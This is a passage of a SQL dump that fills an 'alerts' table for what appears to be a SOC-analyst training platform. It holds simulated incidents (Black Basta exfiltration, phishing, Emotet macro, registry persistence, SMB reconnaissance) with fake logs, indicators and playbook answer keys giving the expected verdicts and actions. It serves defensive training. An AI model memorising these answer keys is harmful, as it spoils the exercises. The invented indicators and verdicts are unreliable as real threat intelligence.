associated with QBot malware.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory Logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials suspected to be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1541, 'Sensitive Data Exfiltration Attempt', 'critical', 'Data Loss Prevention (DLP) System', 'An advanced persistent threat group, Black Basta, attempted to exfiltrate confidential data from the internal network as part of a double extortion scheme. The operation involved transferring sensitive files to an external server before encrypting the stolen data to demand a ransom.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:05:32Z\",\"event_id\":\"DLPEX123456\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jane.doe\",\"file_name\":\"confidential_report.docx\",\"hash\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"action\":\"exfiltration_attempt\",\"protocol\":\"FTP\",\"threat_actor\":\"Black Basta\"}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal source IP address associated with the exfiltration attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internet_reputation\",\"verdict\":\"malicious\",\"details\":\"External IP address linked to known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document targeted for exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Black Basta 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_hr\",\"verdict\":\"clean\",\"details\":\"Valid user account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1542, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting employees, attempting to gain entry to the network by tricking users into providing their credentials. The email contained a malicious link pointing to a credential harvesting site.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.25\",\"subject\":\"Urgent: Update Required\",\"from\":\"attacker@example.com\",\"to\":\"employee@company.com\",\"malicious_url\":\"http://malicious-site.com/login\",\"attachment\":{\"filename\":\"Security_Update.docx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\"},\"user_agent\":\"Mozilla/5.0\",\"x_mailer\":\"PhishMailer v2.3\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known phishing server\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Credential harvesting site\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Low detection rate\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.440Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1543, 'Malicious Macro Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the attachment in the phishing email, a macro is executed, serving as the initial payload to establish a foothold within the system. The macro downloaded additional malicious payloads that attempt to communicate with a known malicious IP.', 'Execution', 'T1059.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"EXE12345\",\"username\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"file_name\":\"invoice_macro_v2.docm\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"WINWORD.EXE\",\"command_line\":\"WINWORD.EXE /m invoice_macro_v2.docm\",\"malware_family\":\"Emotet\",\"malicious_url\":\"http://malicious-downloads.com/payload\",\"detected_by\":\"EDR\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for Emotet.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice_macro_v2.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File contains macro code commonly used in Emotet campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Emotet macro payload.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-downloads.com/payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware 
distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1544, 'Establishing Persistence Mechanism', 'medium', 'Registry Change Logs', 'The attackers modify system registry settings to establish a persistent presence, allowing them to maintain access even after system reboots. A particular registry key associated with system startup was altered to include a malicious executable linked to known APT activity.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:23Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.20\",\"username\":\"compromised_user\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"action\":\"MODIFY\",\"new_value\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"file\":\"malicious.exe\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"File recognized as a component of malware used in persistence mechanisms.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1545, 'Internal Network Reconnaissance', 'medium', 'Network Traffic Analysis', 'The attackers begin to explore the internal network, searching for critical systems and valuable data, preparing for further exploitation.', 'Lateral Movement', 'T1046: Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"port\":445,\"user\":\"john.doe\",\"filename\":\"network_mapper.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Suspicious network scanning detected\",\"additional_info\":{\"scan_type\":\"SMB\",\"attempts\":5,\"detected_by\":\"IDS\",\"previous_incidents\":\"None\"}}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP used in multiple previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with network scanning malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"network_mapper.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual application used for network 
scanning.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1546, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'Exfiltration of sensitive data has been detected, indicating the final stage of an attack where attackers prepare to leverage stolen information for ransom demands.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:27:03Z\",\"event_id\":\"EXFIL12345\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.50\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"exfil_filename\":\"confidential_data.zip\",\"exfil_filehash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"alert\",\"message\":\"Data exfiltration attempt detected over HTTPS to external IP.\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration destination used in previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"suspicious\",\"details\":\"File previously flagged in similar exfiltration attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Standard user credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over 